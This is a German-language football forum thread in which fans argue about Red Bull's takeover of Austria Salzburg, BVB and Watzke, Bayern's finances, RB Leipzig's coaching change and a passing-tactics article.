Puuuh, glaubst immer noch dran, dass der BVB so stark ist.:shock:
mMn ist eine reine Wunschvorstellung, dass der BVB die Nummer 2 hinter den Bayern ist!
PS: Wobei ich Wolfburg überhaupt ned mag in der D-Liga. Das hat einige Gründe, was mir als Fussballfan an diesem Verein nicht gefällt. ;-)
Stiffler
10.02.2015, 20:07
Puuuh, glaubst immer noch dran, dass der BVB so stark ist.:shock:
mMn ist eine reine Wunschvorstellung, dass der BVB die Nummer 2 hinter den Bayern ist!
PS: Wobei ich Wolfburg überhaupt ned mag in der D-Liga. Das hat einige Gründe, was mir als Fussballfan an diesem Verein nicht gefällt. ;-)
Ja, denke ich und bin von überzeugt.
Die letzten 4-5 Jahre haben dies teils Eindrucksvoll gezeigt. Einzig das Festhalten an Klopp, so denke ich, könnte irgendwann zum Bumerang werden. Finanziell wie sportlich.
Ergänzend zu vorhin möchte ich anfügen, dass ich diewsen Schritt begrüße. Das Geld welches sie für einen Miki, Immobile etc ausgegeben haben (knapp 50 Mio, Gehalt exkl.!) wird hier wesentlich sinnvoller investiert.
Unbestritten, oder?
shadow08
10.02.2015, 21:08
Könntest eh nicht - meine Meinung bilde ich mir schon selbst, auch wenn ich nach ordentlicher Argumentation durchaus bereit bin diese zu ändern sofern notwendig
Nicht notwendig. ;)
Mir gefällt schon dass du es nun doch verstehen könntest wenn du dich genau in diese Lage versetzen würdest.
Viele winken ja sogar dabei noch ab.
Meine Dose! :nod:
Das triffts sogar noch besser. :thumb:
@ Alex was mir da einfach nicht gefällt ist dass die die den Karren in den Mist ( Ruin) gefahren haben viel zu gut wegkommen ;-)
hab da ein Beispiel dazu:
ein Hans-Joachim Watzke wird immer als Retter des BVB gesehen und er stellt sich auch immer als Retter hin :shock:
was die wenigsten wissen ist das der Herr Watzke ab 2001 Schatzmeister war beim BVB und 2005 dann Geschäftsführer ;-)
Jetzt meine Frage für was ist ein Schatzmeister zuständig in einem Verein?
Und wann war der BVB Pleite?
wennst dir die Zeiten anschaust kommst schnell drauf wer den Karren mit in die Scheiße gefahren hat ;-)
aber heute wird nur vom Retter gesprochen ;-) merkst was?
Stiffler
10.02.2015, 21:50
Dieser Watzke... :nono:
shadow08
10.02.2015, 22:04
@ Alex was mir da einfach nicht gefällt ist dass die die den Karren in den Mist ( Ruin) gefahren haben viel zu gut wegkommen ;-)
hab da ein Beispiel dazu:
ein Hans-Joachim Watzke wird immer als Retter des BVB gesehen und er stellt sich auch immer als Retter hin :shock:
was die wenigsten wissen ist das der Herr Watzke ab 2001 Schatzmeister war beim BVB und 2005 dann Geschäftsführer ;-)
Jetzt meine Frage für was ist ein Schatzmeister zuständig in einem Verein?
Und wann war der BVB Pleite?
wennst dir die Zeiten anschaust kommst schnell drauf wer den Karren mit in die Scheiße gefahren hat ;-)
aber heute wird nur vom Retter gesprochen ;-) merkst was?
Ich weiß nicht wie es dir gefallen würde?
Quehenberger hier öfter negativ würde nichts bringen, weil er sich aus dem Fussball ohnehin schon zurückgezogen hat. Wenn er sich in Interviews positiv gegenüber RB äußert würd ich ihm eh am liebsten ... eh scho wissen.
Sein Unternehmen verweigern fällt mir schwer weil ich es ohnehin ned brauchen könnt somit auch das hinfällig. Er ist einfach eh nur noch ein Nichts. RB hingegen genießt im Fussball teilweise einen Ruf der ihnen nicht zusteht. Da würde man natürlich nichts lieber als diesen zu zerstören. ;)
Das Beispiel mit dem BVB bringt meiner Meinung nach nichts im Vergleich mit Salzburg.
Habs jetzt ned recherchiert, aber klingt so als hätte Watzke scheisse gebaut und sie dann ausgebadet und ist jetz der Held, richtig?
Dieser Held hätte bei uns Quehenberger werden können, alles andere kannst nicht vergleichen.
Weiter weißt du genau um welche Punkte es mir hauptsächlich geht, beim BVB wurde nichts am Verein geändert (Farben, Name, usw.) um aus der Scheisse zu kommen.
Das Beispiel kann man schon hernehmen ;-)
Du schreibst nur wie sch.... RB ist beim BVB spricht man nur vom Retter.
aber es wird nicht geschrieben wer, warum, usw. den Karren in die Scheiße gefahren hat ;-) das fehlt mir einfach!
das ist das gleiche wie sehr viele einfach über Bayern schimpft weil sie so viel Geld haben ohne sich zu Informieren wie das zu Stande kam ;-)
Bayern musste in den 80er Jahre an Rummenigge für 11 Mio D Mark verkaufen weil sonst die nächste Saison nicht gesichert gewesen wäre! was Sie dann von der Zeit bis jetzt geleistet haben ( Finanzen) das schreibt keiner von denen Hauptsache es wird geschimpft weil sie heute viel Geld haben;-)
vergiss mal Name,Farbe usw. entscheiden ist der Grund warum es soweit kam ;-)
hättet Ihr damals 5 Mio € auf der hohen Kante gehabt wäre doch RB nie eine Option gewesen oder?
um das geht es mir ;-)
shadow08
10.02.2015, 22:42
Das Beispiel kann man schon hernehmen ;-)
Du schreibst nur wie sch.... RB ist beim BVB spricht man nur vom Retter.
aber es wird nicht geschrieben wer, warum, usw. den Karren in die Scheiße gefahren hat ;-) das fehlt mir einfach!
Nö das lass ich dir ned gelten. :-P
Salzburg: Einer fährt den Karren in die Scheisse und verschwindet, ein Anderer holt den Karren raus (wobei er das ned mal macht denn eigentlich ists ein neue Verein mit dem Bonus gleich ganz oben zu starten) und soll für Arschaktionen bewundert werden...?
Dortmund: Einer fährt den Karren in die Scheisse und der Gleiche holt ihn auch wieder raus. Also eigentlich müsstest da jetzt darauf bestehen, dass man Watzke noch mehr in den Himmel lobt. ;)
das ist das gleiche wie sehr viele einfach über Bayern schimpft weil sie so viel Geld haben ohne sich zu Informieren wie das zu Stande kam ;-)
Bayern musste in den 80er Jahre an Rummenigge für 11 Mio D Mark verkaufen weil sonst die nächste Saison nicht gesichert gewesen wäre! was Sie dann von der Zeit bis jetzt geleistet haben ( Finanzen) das schreibt keiner von denen Hauptsache es wird geschimpft weil sie heute viel Geld haben;-)
vergiss mal Name,Farbe usw. entscheiden ist der Grund warum es soweit kam ;-)
hättet Ihr damals 5 Mio € auf der hohen Kante gehabt wäre doch RB nie eine Option gewesen oder?
um das geht es mir ;-)
Ich hab die Bayern auch schon immer gehasst, aber die Top-Leistung im finanziellen Bereich habe ich eh sogar hier schon anerkannt.
Wenn ich mir manche Kommentare vom Q. anschaue wäre ich mir da gar ned so sicher ob es ned dennoch eine Option gewesen wäre.
Den Bayern wird sowas wohl wirklich nie passieren, aber stells dir mal vor so wie ichs dem Thorsten als Beispiel nannte, alles was uns passierte soll euch passieren und dann sag mir ob du immer noch alles schönreden würdest?
Darum geht es! Denn passieren kann sowas jedem Verein, entscheidend ist was man dann daraus macht und da gehen halt die Meinungen auseinander.
Nö das lass ich dir ned gelten. :-P
Salzburg: Einer fährt den Karren in die Scheisse und verschwindet, ein Anderer holt den Karren raus (wobei er das ned mal macht denn eigentlich ists ein neue Verein mit dem Bonus gleich ganz oben zu starten) und soll für Arschaktionen bewundert werden...?
Dortmund: Einer fährt den Karren in die Scheisse und der Gleiche holt ihn auch wieder raus. Also eigentlich müsstest da jetzt darauf bestehen, dass man Watzke noch mehr in den Himmel lobt. ;)
ja da geb ich dir recht nur da Herr W. betont immer als er 2005 zum BVB kam war er Pleite er verschweigt die Zeit von 2001 bis 2005 als Schatzmeister war soll man Ihn da wirklich in den Himmel loben?
was er dann von 2005 bis jetzt gemacht hat ist ne sehr gute Leistung ohne Zweifel!
Ich hab die Bayern auch schon immer gehasst, aber die Top-Leistung im finanziellen Bereich habe ich eh sogar hier schon anerkannt.
Wenn ich mir manche Kommentare vom Q. anschaue wäre ich mir da gar ned so sicher ob es ned dennoch eine Option gewesen wäre.
Den Bayern wird sowas wohl wirklich nie passieren, aber stells dir mal vor so wie ichs dem Thorsten als Beispiel nannte, alles was uns passierte soll euch passieren und dann sag mir ob du immer noch alles schönreden würdest?
Darum geht es! Denn passieren kann sowas jedem Verein, entscheidend ist was man dann daraus macht und da gehen halt die Meinungen auseinander.
die Kommentare von Q. kenne ich nicht
ja die Wahrscheinlichkeit liegt bei 0,01% das sowas passiert aber sollte sowas passieren dann bin ich mir Sicher das RB keine Option ist !
ja aber der Auslöser war nicht RB oder hat Euch RB in den Ruin getrieben? oder wart Ihr schon kurz vor der Pleite als RB kam?
Stiffler
10.02.2015, 22:59
Mal davon ab und ohne dass ich der Austria und/oder dem österreichischen Fussball zu nahe treten möchte, hier herrschen schon wesentlich professionellere Strukturen:
Ein Rummenigge, ein Scherer, Uli - die würden gesteinigt und ausgewiesen für einen Verkauf samt Mitbestimmungsrecht, samt Übernahme.
Einen Investor wie RB gings ganz am Schluß an den Kragen :lol:
In völlig anderer Dimension und nicht auf bestimmender Ebene haben wir allerdings genau das mit AUDI, Allianz, adidas :noidea:
ich darf kurz zitieren:
Die kumulierten Anteile der drei Fremdinvestoren betragen 24,99 Prozent der FC Bayern München AG und liegen somit unterhalb der Sperrminorität, wodurch sich der FC Bayern gegen eine zu hohe Einflussnahme der Investoren abgesichert hat.
Wie du richtig sagst, wichtig ist was du draus machst.
Was Mane meint, die Fehler die du heute Mateschitz vorwirfst, die haben andere gemacht, aber die waren violett und da wars dir wurscht...
shadow08
10.02.2015, 23:04
ja die Wahrscheinlichkeit liegt bei 0,01% das sowas passiert aber sollte sowas passieren dann bin ich mir Sicher das RB keine Option ist !
ja aber der Auslöser war nicht RB oder hat Euch RB in den Ruin getrieben? oder wart Ihr schon kurz vor der Pleite als RB kam?
Egal ob 0,01% oder 0,0% du sollst dich mal in die Lage versetzen und mir sagen wie du dich dann entscheiden würdest.
Ob das nun RB oder sonst ein Unternehmen ist wäre ja egal, es soll einfach das Gleiche angerichtet werden...
In den Ruin treiben kann immer passieren, man kann sich aber auch gemeinsam wieder raus arbeiten.
RB hat Austria Salzburg nicht gerettet sondern eigentlich vernichtet.
Aber wir lassen uns zum Glück ned so einfach vernichten. :-P
Egal ob 0,01% oder 0,0% du sollst dich mal in die Lage versetzen und mir sagen wie du dich dann entscheiden würdest.
Ob das nun RB oder sonst ein Unternehmen ist wäre ja egal, es soll einfach das Gleiche angerichtet werden...
In den Ruin treiben kann immer passieren, man kann sich aber auch gemeinsam wieder raus arbeiten.
RB hat Austria Salzburg nicht gerettet sondern eigentlich vernichtet.
Aber wir lassen uns zum Glück ned so einfach vernichten. :-P
jetzt beantworte mir mal meine Frage;-)
ned immer was daraus gemacht wurde das wissen wir ja jetzt scho :lol:
i soll mir immer was vorstellen aber meine Fragen werden ned beantwortet :cry:8-)
shadow08
10.02.2015, 23:10
Wie du richtig sagst, wichtig ist was du draus machst.
Was Mane meint, die Fehler die du heute Mateschitz vorwirfst, die haben andere gemacht, aber die waren violett und da wars dir wurscht...
Welcher Fehler meinst jetz genau?
Was soll mir damals wurscht gewesen sein? Das schlecht gewirtschaftet wurde? Nix neues in Ö. :)
shadow08
10.02.2015, 23:11
i soll mir immer was vorstellen aber meine Fragen werden ned beantwortet :cry:8-)
Du stellst dir sowas nur nie vor. ;)
Hab dir mit meinem letzten Absatz deine Frage beantwortet. ;)
Alex tut mir leid aber da hast so gut wie nix beantwortet :cry:
nochmal:
1.War RB der Auslöser das Ihr in Finanzelle Schwierigkeiten gekommen seid´s?
2. Hat RB Euch in den Ruin getrieben?
3. wart Ihr schon kurz vor der Pleite als RB kam?
du musst auch nicht´s erklären mir reicht es schon wennst es so machst zB.
1 ja
2 nein
3 nein
verstehst ;-)
ned das kann jeden Passieren :fish:
Stiffler
10.02.2015, 23:19
Welcher Fehler meinst jetz genau?
Was soll mir damals wurscht gewesen sein? Das schlecht gewirtschaftet wurde? Nix neues in Ö. :)
Die Fehler die den Verein in diese Lage gebracht haben dass, so habe ich es aufgefasst, nur Pleite und ein Beginn ganz unten oder Verkauf die möglichen Optionen waren.
Und ich behaupte weiter:
Das gern angenomme Feindbild RB ist u.a. daran "Schuld", dass du heute so sehr violett bist. ;-)
In der Fussballwelt gibt es genügend Beispiele wo es anders lief. Vereine die unten wieder von Neu begannen, verloren ihre Fans an andere, spielen keine Rolle mehr, wurden schlicht vergessen.
Und ja, dass in Österreich schlecht gewirtschaftet wird auf sportlicher Ebene ist tasächlich nichts Neues. Ob das Wien, Salzburg, Graz oder Linz ist - da habts südländische Verhältnisse. Und endlich ist einer angreifbar - wunderbar :-)
shadow08
10.02.2015, 23:25
Alex tut mir leid aber da hast so gut wie nix beantwortet :cry:
nochmal:
1.War RB der Auslöser das Ihr in Finanzelle Schwierigkeiten gekommen seid´s?
2. Hat RB Euch in den Ruin getrieben?
3. wart Ihr schon kurz vor der Pleite als RB kam?
du musst auch nicht´s erklären mir reicht es schon wennst es so machst zB.
1 ja
2 nein
3 nein
verstehst ;-)
Da hätt ich mir mehr von dir erwartet, aber da du dir solche Sachen eh ned vorstellen willst wirst in der Diskussion untergehen. :-P
Stell halt mal gscheide Fragen, denn sei mir ned böse, des is überflüssig.
Du schreibst wir wissen was draus gemacht wurde. :thumb:
Wir wissen aber auch alle was davor passiert ist also wieso willst es nochmal hören?
Aber gerne nochmal:
Nein RB war ned der Auslöser.
Nein RB hat uns nicht in den ruin getrieben, aber die damalige Austria Salzburgt vernichtet.
Ja so ziemlich.
Alles Tatsachen die du jetzt nochmal hörst, die aber nichts daran ändern oder hab ichs irgendwo geleugnet dass es so war?
Ich habs oft genug betont, alles entscheidend ist einfach was RB nach der Übernahme gemacht hat.
Und jetzt bist du dran stell es dir endlich vor und sag mir welchen Weg du gehen würdest. :-P
shadow08
10.02.2015, 23:29
Die Fehler die den Verein in diese Lage gebracht haben dass, so habe ich es aufgefasst, nur Pleite und ein Beginn ganz unten oder Verkauf die möglichen Optionen waren.
Und ich behaupte weiter:
Das gern angenomme Feindbild RB ist u.a. daran "Schuld", dass du heute so sehr violett bist. ;-)
In der Fussballwelt gibt es genügend Beispiele wo es anders lief. Vereine die unten wieder von Neu begannen, verloren ihre Fans an andere, spielen keine Rolle mehr, wurden schlicht vergessen.
Und ja, dass in Österreich schlecht gewirtschaftet wird auf sportlicher Ebene ist tasächlich nichts Neues. Ob das Wien, Salzburg, Graz oder Linz ist - da habts südländische Verhältnisse. Und endlich ist einer angreifbar - wunderbar :-)
Den Vergleich versteh ich grad ned weil früher in violett andere Fehler gemacht wurden als aktuell mit RB!?!?
Und nein die sind nicht schuld daran dass ich so ein violetter bin, das war ich wirklich schon immer. ;)
Ich hatte ja sogar daheim das Duell violett vs violett weil mein Dad Austria Wien Fan ist. :)
Da hätt ich mir mehr von dir erwartet, aber da du dir solche Sachen eh ned vorstellen willst wirst in der Diskussion untergehen. :-P
Stell halt mal gscheide Fragen, denn sei mir ned böse, des is überflüssig.
Du schreibst wir wissen was draus gemacht wurde. :thumb:
Wir wissen aber auch alle was davor passiert ist also wieso willst es nochmal hören?
Aber gerne nochmal:
Nein RB war ned der Auslöser.
Nein RB hat uns nicht in den ruin getrieben, aber die damalige Austria Salzburgt vernichtet.
Ja so ziemlich.
Alles Tatsachen die du jetzt nochmal hörst, die aber nichts daran ändern oder hab ichs irgendwo geleugnet dass es so war?
Ich habs oft genug betont, alles entscheidend ist einfach was RB nach der Übernahme gemacht hat.
Und jetzt bist du dran stell es dir endlich vor und sag mir welchen Weg du gehen würdest. :-P
für Dich Überflüssige fragen ;-) aber sie sind entscheidend ;-)
na schau der Auslöser war nicht RB und hat nicht´s beigetragen das Ihr da hingekommen seid´s! Also was bitte hat RB falsch gemacht das die Austria in die Lange gekommen ist? NICHTS!
was dann passiert ist steht auf dem nächsten Blatt da gebe ich Dir eh zum größten Teil recht!
und jetzt kann ich Dir auch sagen ich kann mir so was auch ned Vorstellen wenn so was bei Bayern eintreten würde es wär schrecklich :shock:
aber ich würde die Hauptschuld immer denen geben die den Karren in den Dreck gefahren haben und ned denen die danach gekommen sind ;-)
shadow08
10.02.2015, 23:40
für Dich Überflüssige fragen ;-) aber sie sind entscheidend ;-)
na schau der Auslöser war nicht RB und hat nicht´s beigetragen das Ihr da hinkommt! Als was bitte hat RB falsch gemacht das die Austria in die Lange gekommen ist? NICHTS!
was dann passiert ist steht auf dem nächsten Blatt da gebe ich Dir eh zum größten Teil recht!
und jetzt kann ich Dir auch sagen ich kann mir sowas auch ned Vorstellen wenn sowas bei Bayern eintreten würde es wär schrecklich :shock:
aber ich würde die Hauptschuld immer denen geben die den Karren in den Dreck gefahren haben und ned denen die danach gekommen sind ;-)
Ansichtssache, bei uns in Ö ist es nichts neues dass die Karren in der Scheisse landen. Ist ärgerlich aber kann passieren. Wie man den Karren allerdings wieder rausholt ist für mich entscheidender und das wäre in dieser Form ned nötig gewesen. Dadurch wird der angebliche Retter sogar noch mehr gehasst als der eigentliche Verursacher.
Selbst schuld da braucht man sich nicht wundern über diverse Proteste.
ich kann nicht 20 Jahre rauchen und wenn ich dann Lungenkrebs hab der Tabakindustrie die schuld geben!
shadow08
10.02.2015, 23:45
ich kann nicht 20 Jahre rauchen und wenn ich dann Lungenkrebs hab der Tabakindustrie die schuld geben!
Jetzt drehst dir grad dein eigenes Beispiel um :lol:
Wer hat denn hier zuerst was falsch gemacht? :-P
Die Tabakindustrie hat etwas schädliches produziert, eigentlich trifft dich ja dann keine Schuld wenn du danach 20 Jahre rauchst! (Nach deiner Theorie) :lol:
Klassisches Eigentor, oder? :mrgreen:
Jetzt drehst dir grad dein eigenes Beispiel um :lol:
Wer hat denn hier zuerst was falsch gemacht? :-P
Die Tabakindustrie hat etwas schädliches produziert, eigentlich trifft dich ja dann keine Schuld wenn du danach 20 Jahre rauchst! (Nach deiner Theorie) :lol:
Klassisches Eigentor, oder? :mrgreen:
nei weil ich weiß das es ned gesund ist und mach es trotzdem ;-) ich weiß das ich Krank werden kann!
ist auch wie wenn ich mehr Geld ausgebe wie ich einnehme dann weiß ich auch das die Bank den Geldhahn mal abdreht ;-)
was ist da für ein Unterschied?
gn8 Alex :yo:
shadow08
10.02.2015, 23:53
nei weil ich weiß das es ned gesund ist und mach es trotzdem ;-) ich weiß das ich Krank werden kann!
ist auch wie wenn ich mehr Geld ausgebe wie ich einnehme dann weiß ich auch das die Bank den Geldhahn mal abdreht ;-)
was ist da für ein Unterschied?
gn8 Alex :yo:
Damit gibst mir recht. ;)
Du weißt das es schlecht ist und machst es trotzdem. Somit bist auch selbst schuld.
RB wusste dass sie was (für viele) schlechtes machen und haben es trotzdem gemacht. Somit sind sie auch selbst schuld.
In beiden Fällen denkt man nicht mehr daran dass davor ein Anderer eigentlich der Auslöser dafür war. ;)
passt i will eh auch scho ins Bett, gn8 ;)
Stiffler
10.02.2015, 23:56
Den Vergleich versteh ich grad ned weil früher in violett andere Fehler gemacht wurden als aktuell mit RB!?!?
Und nein die sind nicht schuld daran dass ich so ein violetter bin, das war ich wirklich schon immer. ;)
Ich hatte ja sogar daheim das Duell violett vs violett weil mein Dad Austria Wien Fan ist. :)
Natürlich waren das andere Fehler, die Konsequenz daraus musst du dennoch als Fan tragen.
Ja, ich bestritt nie dass stets ein "richtiger" Violetter warst, bist und sein wirst.
Dennoch traue ich mich behaupten, dass, wäre RB nicht gekommen, die Austria Pleite gegangen, unten beginnend, du, oder zumindest sehr, sehr viele andere, sich nicht mehr wirklich damit identifizieren würden. Zumindest nicht so sehr wie es aktuell der Fall ist.
In Deutschland ist es einfach, du suchst Dir Bayern München als Feindbild aus und schon passts. Das reicht vielen schon aus sich mit "ihrem" Verein besser zu identifizieren, sich als "besserer" Fan zu fühlen.
Das es nrigends ohne Asche geht, merken sie irgendwann später dann :lol:
Dazu passt, dass viele die Bayern München aufgrund ihrer finanziellen wie sportlichen Erfolge respektieren können (da sie der Einfachheit halber auf ihren gesunden Menschenverstand zurück greifen?) nicht in das Schema "Hater"
"Besessen"
"Ultra"
"Hooligan"
"Supporter"
passen und zugleich auf Schwanzlängenvergleiche a lá "echter Fan", "viel lauter", "besserer Fan" verzichten können.
Zugleich aber, und das rechne ich jenen wirklich hoch an, stehen sie zu ihrem Verein, in guten wie in schlechten Zeiten.
Das kann man auch ohne irgend etwas anderes schlecht gemacht zu haben.
Ergo:
Dein Hass (<-- durchaus angebracht!) gegenüber RB macht dich nicht zu einem besseren Violetten in meinen Augen
Damit gibst mir recht. ;)
Du weißt das es schlecht ist und machst es trotzdem. Somit bist auch selbst schuld.
RB wusste dass sie was (für viele) schlechtes machen und haben es trotzdem gemacht. Somit sind sie auch selbst schuld.
In beiden Fällen denkt man nicht mehr daran dass davor ein Anderer eigentlich der Auslöser dafür war. ;)
passt i will eh auch scho ins Bett, gn8 ;)
:doh:
so wie Du das liest haben die Austria Verantwortlichen wirklich keine Schuld :lol: Bei Euch war die Bank schuld weil die hätten den Geldhahn zudrehen müssen als Ihr noch Geld hattet :mrgreen:
somit ist das Thema für mich geklärt 8-)
zur Info weils hier irgendwie her passt :mrgreen:
RB Leipzig soll Trainer Zorniger entlassen haben ;-)
Naja Zornig hat sich durch mehrere Sachen quasi gefeuert.
a) zu behaupten man muss nicht jetzt aufsteigen ist nicht unbedingt bei RB förderlich.
Auch wenn es Druck von der Mannschaft nehmen soll und wirklich nicht schlimm ist 1 Jahr weiter in der 2. Liga zu spielen. Aber so geht man eben nicht bei RB um.
b) zu sagen, dass er als Trainer für den Aufstieg in die Bundesliga mindestens ein gleichgroßes Denkmal bekommen müsste, wie der Sportdirektor ist dann wohl noch mehr fehl am Platz.
tja und dazu kommen dann die Leistungen am Feld. Das war nicht so wie man es sich wünscht.
Bin aber gespannt wer da nachfolgen wird. Gibts da schon Gerüchte?
Oha. Ist der frei?
Dachte Tuchel muss 1 Jahr quasi unbezahlt Urlaub nehmen (hab aber sowieso nie verstanden wie das rechtlich möglich ist)
NIDO_81 --> :fish: <-- Mane17
versuche nicht einem eingefleischten Austria Salzburg Anhänger irgendwas mit Red Bull ist eh in Ordnung odgl. verklickern zu wollen. Und schon gar nicht, wenn Bier am Tisch steht :mrgreen:
Und der Fisch ist meiner! :mrgreen:
shadow08
11.02.2015, 09:59
Natürlich waren das andere Fehler, die Konsequenz daraus musst du dennoch als Fan tragen.
Ja, ich bestritt nie dass stets ein "richtiger" Violetter warst, bist und sein wirst.
Dennoch traue ich mich behaupten, dass, wäre RB nicht gekommen, die Austria Pleite gegangen, unten beginnend, du, oder zumindest sehr, sehr viele andere, sich nicht mehr wirklich damit identifizieren würden. Zumindest nicht so sehr wie es aktuell der Fall ist.
Da kann ich dir recht geben es wären damals wahrscheinlich genau die Fans den Weg hinunter mitgegangen die es jetzt ohnehin sind. Ich selbst wäre damals egal auf welchem Weg mit nach unten gegangen. Die Liga spielt für mich keine Rolle, klar ist es ganz oben was besonderes, aber für mich nicht das Wichtigste. Da ist mir die Vereinstreue wichtiger. ;)
Ergo:
Dein Hass (<-- durchaus angebracht!) gegenüber RB macht dich nicht zu einem besseren Violetten in meinen Augen
Hab ich auch nie behauptet. ;)
:doh:
so wie Du das liest haben die Austria Verantwortlichen wirklich keine Schuld :lol: Bei Euch war die Bank schuld weil die hätten den Geldhahn zudrehen müssen als Ihr noch Geld hattet :mrgreen:
somit ist das Thema für mich geklärt 8-)
zur Info weils hier irgendwie her passt :mrgreen:
RB Leipzig soll Trainer Zorniger entlassen haben ;-)
Geklärt indem du eine falsche Meinung stehen lässt. :twisted:
Ich hab nie gesagt dass die Austria Verantwortlichen keine Schuld trifft, aber warum soll ich gegen wen protestieren der scheisse gebaut hat, seine Konsequenzen gezogen hat, damit zum Teil noch mehr geschadet hat und mittlerweile ohnehin schon im Nichts verschwunden ist?
Vor allem wenn da noch die sind die einen noch größeren Scheiß gebaut haben, immer noch aktiv sind und dafür Respekt verlangen?
Q. sein Ruf ist bereits ruiniert und M. verdient (im Fussball) keinen guten Ruf.
So sehe ich es und da kannst schönreden was du willst und in meinen Augen verstehst du das Grundprinzip ned worum es mir geht.
Vielleicht willst es auch einfach ned verstehen. :-P
Das es dich nicht betrifft ist mir klar, aber du willst dich ja auch nicht einmal in die Lage versetzen und meiner Ansicht willst du auch keine Zustimmung erteilen sondern mir klar machen das ich einen 'Denkfehler' drinnen habe. ;)
Seit deinem Beispiel mit dem Rauchen solltest aber du nochmal deine Variante überdenken denn da schreibst du dass du selbst schuld bist und da du auf die Reihenfolge bestehst dass die Hauptveranwortlichen an den Pranger gestellt werden dann müsstest du in diesem Fall die Tabakindustrie an den Pranger stellen.
Wennst mir sagst du willst meine Sichtweise ned verstehen ists für mich ok, aber ich lass mir ned einreden dass ich meinen Hass auf die falschen Leute projeziere. ;)
shadow08
11.02.2015, 10:00
NIDO_81 --> :fish: <-- Mane17
versuche nicht einem eingefleischten Austria Salzburg Anhänger irgendwas mit Red Bull ist eh in Ordnung odgl. verklickern zu wollen. Und schon gar nicht, wenn Bier am Tisch steht :mrgreen:
Und der Fisch ist meiner! :mrgreen:
Genial, genau den Vorschlag hat mir Mane gestern eigentlich gebracht per Whatsapp, dass wir das Ganze mal gemütlich mit einer Kiste Bier bequatschen. :lol:
Neurer Taktiktrend?
http://www.laola1.at/de/fussball/sonstiges/der-absichtliche-fehlpass-taktisches-mittel-frank-wormuth-oliver-glasner-maehlich-klopp/page/101250-437-63-63-.html
Fehlpass zum Gegner als "Angriff".
shadow08
11.02.2015, 10:10
Neurer Taktiktrend?
http://www.laola1.at/de/fussball/sonstiges/der-absichtliche-fehlpass-taktisches-mittel-frank-wormuth-oliver-glasner-maehlich-klopp/page/101250-437-63-63-.html
Interessante Variante, schaut im ersten Moment sicher lustig aus, aber auf Dauer?
Ist halt auch die Frage ob man es dann wirklich gut umsetzen kann oder doch mehr darunter leidet, weil auch die Verteidiger können sich darauf einstellen wenns mal öfter vorkommt.
Stiffler
11.02.2015, 10:16
Neurer Taktiktrend?
Darauf wird auch im ersten Buch von Pep eingegangen.
Allerdings nicht im absichtlichen Sinne, sondern im riskanten Sinne.
Es wird versucht äußert genau festzulegen, wann ein Risikopass gespielt werden soll, wird der abgefangen, gegen gepresst etc...
Daraus folgte die Erkenntnis, dass eine Vielzahl von Großchancen mit dem zweiten Ball generiert werden konnten, zumindest mehr als mit dem ersten.
Verteidigen ist stets einfacher als angreifen - gerade für Betonmischmaschinen.
Ich sehs schon kommen. Es kommt irgendwann wieder das Kick and Rush.
Keiner will mehr den Ball haben, somit haut man ihn einfach weg (nach vorne) ;-)
Stiffler
11.02.2015, 10:33
Ich sehs schon kommen. Es kommt irgendwann wieder das Kick and Rush.
Keiner will mehr den Ball haben, somit haut man ihn einfach weg (nach vorne) ;-)
:lol: ja, das wird die Maßnahme der Unterlegenen Teams
Da kann ich dir recht geben es wären damals wahrscheinlich genau die Fans den Weg hinunter mitgegangen die es jetzt ohnehin sind. Ich selbst wäre damals egal auf welchem Weg mit nach unten gegangen. Die Liga spielt für mich keine Rolle, klar ist es ganz oben was besonderes, aber für mich nicht das Wichtigste. Da ist mir die Vereinstreue wichtiger. ;)
Hab ich auch nie behauptet. ;)
Geklärt indem du eine falsche Meinung stehen lässt. :twisted:
Ich hab nie gesagt dass die Austria Verantwortlichen keine Schuld trifft, aber warum soll ich gegen wen protestieren der scheisse gebaut hat, seine Konsequenzen gezogen hat, damit zum Teil noch mehr geschadet hat und mittlerweile ohnehin schon im Nichts verschwunden ist?
Vor allem wenn da noch die sind die einen noch größeren Scheiß gebaut haben, immer noch aktiv sind und dafür Respekt verlangen?
Q. sein Ruf ist bereits ruiniert und M. verdient (im Fussball) keinen guten Ruf.
So sehe ich es und da kannst schönreden was du willst und in meinen Augen verstehst du das Grundprinzip ned worum es mir geht.
Vielleicht willst es auch einfach ned verstehen. :-P
Das es dich nicht betrifft ist mir klar, aber du willst dich ja auch nicht einmal in die Lage versetzen und meiner Ansicht willst du auch keine Zustimmung erteilen sondern mir klar machen das ich einen 'Denkfehler' drinnen habe. ;)
Seit deinem Beispiel mit dem Rauchen solltest aber du nochmal deine Variante überdenken denn da schreibst du dass du selbst schuld bist und da du auf die Reihenfolge bestehst dass die Hauptveranwortlichen an den Pranger gestellt werden dann müsstest du in diesem Fall die Tabakindustrie an den Pranger stellen.
Wennst mir sagst du willst meine Sichtweise ned verstehen ists für mich ok, aber ich lass mir ned einreden dass ich meinen Hass auf die falschen Leute projeziere. ;)
jetzt zeigst mir noch bei den letzten gefühlten 100 Post wo ich RB schönrede ;-)
Genial, genau den Vorschlag hat mir Mane gestern eigentlich gebracht per Whatsapp, dass wir das Ganze mal gemütlich mit einer Kiste Bier bequatschen. :lol:
da Nido liest bei Dir mit :shock: :mrgreen:
HAR HAR - das führt zu nichts!!! Und einer von beiden liegt dann nun mal im Krankenhaus, vorher hört ja der Salzburger nicht auf :twisted::mrgreen:
shadow08
11.02.2015, 11:03
jetzt zeigst mir noch bei den letzten gefühlten 100 Post wo ich RB schönrede ;-)
da Nido liest bei Dir mit :shock: :mrgreen:
Indem du mir einreden willst das Q. seine Fehler die schlimmeren sind.
Damit würdest du bezwecken dass ich vielleicht nicht ganz so gegen RB schiesse.
Ist für mich schönreden. :)
shadow08
11.02.2015, 11:05
HAR HAR - das führt zu nichts!!! Und einer von beiden liegt dann nun mal im Krankenhaus, vorher hört ja der Salzburger nicht auf :twisted::mrgreen:
hehe na so einer bin i ned, außerdem wenn der Mane in Wien im Spital landen würde dann müsst ich mich vielleicht noch um ihn kümmern, nönö soweit kommts ned :mrgreen:
Indem du mir einreden willst das Q. seine Fehler die schlimmeren sind.
Damit würdest du bezwecken dass ich vielleicht nicht ganz so gegen RB schiesse.
Ist für mich schönreden. :)
der Ausgangspunkt war Q. ohne die Fehler bräuchtest jetzt RB ned Hassen ;-)
will ich wirklich dass Du nicht gegen RB schießt?
Nein !
egal ;-)
wir machen das mit dem Kasten ;-) dann soll da Nido ( Fisch ) Schiedrichter machen den bringen wir dann ins Krankenhaus dann muss sich keiner um jemanden Kümmern :fish::pfeifen::mrgreen::prost:
Neue Kampagne wie man die Hooligans unter Kontrolle halten will (in Brasilien)
„Mütterlicher“ Kampf gegen Hooligans
